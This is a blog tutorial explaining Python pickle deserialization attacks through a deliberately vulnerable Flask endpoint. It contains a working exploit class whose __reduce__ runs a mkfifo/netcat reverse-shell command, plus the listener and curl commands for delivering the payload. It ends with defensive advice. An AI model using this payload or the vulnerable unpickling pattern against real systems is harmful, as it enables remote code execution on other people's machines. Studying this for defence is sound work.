Exploiting Python pickles

22 minute read

In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the pickle module. In this article I want to give a quick introduction of how to pickle/unpickle data, highlight the issues that can arise when your program deals with data from untrusted sources and “dump” my own notes.

For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.

TL;DR: Never unpickle data from sources you don’t trust. Otherwise you open your app up to a relatively simple way of remote code execution.

What is pickle?

In Python, the pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.

When consulting the Python docs for pickle one cannot miss the following warning:

Warning: The pickle module is not secure. Only unpickle data you trust.

Let’s find out why that is and how unpickling untrusted data could ruin your day.

How to dump and load?

In Python you can serialize objects by using pickle.dumps():

import pickle
pickle.dumps(['pickle', 'me', 1, 2, 3])

The pickled representation we’re getting back from dumps will look like this:


And now reading the serialized data back in…

import pickle

…will give us our list object back:

['pickle', 'me', 1, 2, 3]

What is actually happening behind the scenes is that the byte-stream created by dumps contains opcodes that are then one-by-one executed as soon as we load the pickle back in. If you are curious how the instructions in this pickle look like, you can use pickletools to create a disassembly: pickletools.dis(pickled)

>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
    0: \x80 PROTO      4
    2: \x95 FRAME      25
   11: ]    EMPTY_LIST
   12: \x94 MEMOIZE    (as 0)
   13: (    MARK
   14: \x8c     SHORT_BINUNICODE 'pickle'
   22: \x94     MEMOIZE    (as 1)
   23: \x8c     SHORT_BINUNICODE 'me'
   27: \x94     MEMOIZE    (as 2)
   28: K        BININT1    1
   30: K        BININT1    2
   32: K        BININT1    3
   34: e        APPENDS    (MARK at 13)
   35: .    STOP
highest protocol among opcodes = 4

Controlling the behavior of pickling/unpickling

Not every object can be serialized (e.g. file handles) and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview what can and cannot be pickled.

While in most cases you don’t need to do anything special to make an object “picklable”, pickle still allows you to define a custom behavior for the pickling process for your class instances.

Reading a bit further down in the docs we can see that implementing __reduce__ is exactly what we would need to get code execution, when viewed from an attacker’s perspective:

The __reduce__() method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:

  • A callable object that will be called to create the initial version of the object.
  • A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]

So by implementing __reduce__ in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own reverse shell code executed.

Creating a vulnerable app

Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.

We’ll use the web framework Flask to create a small web application with one route.

Let’s install Flask in a new virtual environment:

# setup virtualenv
virtualenv venv --python=/your/path/to/python

# activate
source venv/bin/activate

# install Flask
pip install Flask

And now create app.py:

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/hackme", methods=["POST"])
def hackme():
    data = base64.urlsafe_b64decode(request.form['pickled'])
    deserialized = pickle.loads(data)
    # do something with deserialized or just
    # get pwned.

    return '', 204

At /hackme we implement a POST route that takes form data pickled. The data comes encoded in base64 (for transfer), is decoded and then unpickled.

Let’s run the app with flask run and then prepare our malicious pickled data to send.

Creating the exploit

As described above we want to create a class that implements __reduce__ and then serialize an instance of that class.

We’ll call our class RCE and let its __reduce__ method return a tuple of a callable and a tuple of arguments (as per the mentioned docs).

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
               '/bin/sh -i 2>&1 | nc 1234 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())

Our callable will be os.system and the argument a common reverse shell snippet using a named pipe, that will run on our macOS demo machine.

Now let’s run the exploit script to create a base64 encoded pickle byte stream:

$ python exploit.py

If you run pickletools.dis again, you will see the system callable plus arguments and the REDUCE opcode (R).

Sending the payload

Finally, we can start a netcat listener and send the payload to our listening Flask application:

# netcat listener for reverse shell in separate window/pane
nc -nvl 1234

# Send request
curl -d "pickled=gASVbgAAAAAAAACMBX..."

After sending the http request to /hackme, our code will execute and give us a shell back.

Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.

If you need to work with untrusted data – depending on your use case – consider signing the data if it could have been modified on the way to you or on disk, or choose a different (safer) serialization method altogether (like JSON), as per the docs. When storing pickles on the filesystem it is also worth checking the file permissions to prevent privilege escalations through modification of those pickles.

To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process, the pickle virtual machine parts, and how to craft more general shellcodes using a custom toolset.

Like to comment? Feel free to send me an email or reach out on Twitter.